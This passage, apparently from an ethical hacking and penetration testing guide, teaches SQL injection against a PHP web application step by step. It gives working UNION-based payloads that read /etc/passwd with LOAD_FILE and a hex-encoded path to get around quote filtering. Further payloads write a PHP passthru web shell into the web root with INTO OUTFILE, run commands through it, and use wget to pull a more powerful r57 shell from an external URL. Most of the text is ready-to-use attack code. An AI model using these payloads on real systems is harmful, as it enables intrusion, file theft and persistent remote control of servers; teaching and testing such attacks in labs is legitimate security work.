Syntax
http://localhost/index.php?support=yes' and 1=0 UNION SELECT 1,group_concat(privilege_type),3,4,5,6 FROM information_schema.schema_privileges--
The database returns the privileges granted to the current user on each schema. Global privileges such as FILE, which the next two steps depend on, are listed in information_schema.user_privileges instead.
Reading Files
To read a file from the operating system, we use the MySQL load_file() function. Let's try reading the /etc/passwd file.
http://localhost/index.php?support=yes' and 1=0 UNION SELECT 1,LOAD_FILE('/etc/passwd'),3,4,5,6 FROM information_schema.schemata--
We have successfully managed to read the /etc/passwd file. When a read is not allowed, load_file() returns NULL rather than an error: the database user needs the FILE privilege, the file must be readable by the operating-system user that mysqld runs as, and on newer MySQL versions the secure_file_priv setting restricts which directories may be read. If the application filters or escapes the single quotes around the path, pass the path as a hex literal instead, which needs no quotes at all. The query now becomes
Syntax
http://localhost/index.php?support=yes' and 1=0 UNION SELECT 1,LOAD_FILE(0x2f6574632f706173737764),3,4,5,6 FROM information_schema.schemata--
Writing Files
Ethical Hacking and Penetration Testing Guide
Next, we can upload a simple PHP backdoor that allows us to execute commands on the system. For this we need a directory that is both served by the web server and writable by the operating-system user that mysqld runs as. We will write our backdoor to the /var/www directory, the web root, which in our case happens to be writable. Note that SELECT @@datadir reports MySQL's own data directory, not the web root; the web root usually has to be taken from the web server's default document root or from a path-disclosing error message.
Our simple one-line backdoor is as follows:

<?php passthru($_GET['cmd']); ?>

This lets us execute system commands via the GET parameter cmd; passthru() in PHP runs the command and passes its raw output straight back to the client. To write the file, we use INTO OUTFILE and give it the full path inside the writable directory.
Syntax
http://localhost/index.php?support=yes' and 1=0 UNION SELECT 1,"<?php passthru($_GET['cmd']); ?>",3,4,5,6 INTO OUTFILE '/var/www/shell.php'--
Because the PHP code sits in one column of the UNION row, MySQL writes that row to shell.php. The other columns and the tab separators end up in the file too, but PHP only executes what lies between the <?php and ?> tags, so the backdoor still works. The write requires the FILE privilege, a secure_file_priv setting that does not exclude /var/www, and a file name that does not already exist, since INTO OUTFILE refuses to overwrite. The PHP string itself can be passed as a hex literal if quotes are filtered, but the file name after INTO OUTFILE must remain a quoted string literal.
If everything goes fine, our backdoor is in place and we can execute commands through the cmd parameter. Let's try reading /etc/passwd.
Syntax
http://localhost/shell.php?cmd=cat%20/etc/passwd
The space between the command and its argument is URL-encoded as %20; a browser does this for you when you type the command into the address bar.
Here, we execute our commands on the target system, which is Linux based, so we read Linux-specific files. If it were running Windows, we would have tried files such as boot.ini or win.ini instead.
Since we can now execute commands on the system, we will download a more powerful backdoor from an external URL and write it to the web root. We can use wget to fetch the file, with the -O parameter to choose the output file name; the shell is hosted as a .txt file so that the hosting server serves it as plain text instead of executing it.
Syntax
wget "http://target.com/r57.txt" -O r57.php
The same command is passed through the cmd parameter of shell.php with its spaces URL-encoded. wget writes into the web server process's current working directory, so check that this is the web root, or give -O an absolute path such as /var/www/r57.php.
Now we can access our r57.php shell directly at the following URL:
http://localhost/r57.php
Web Hacking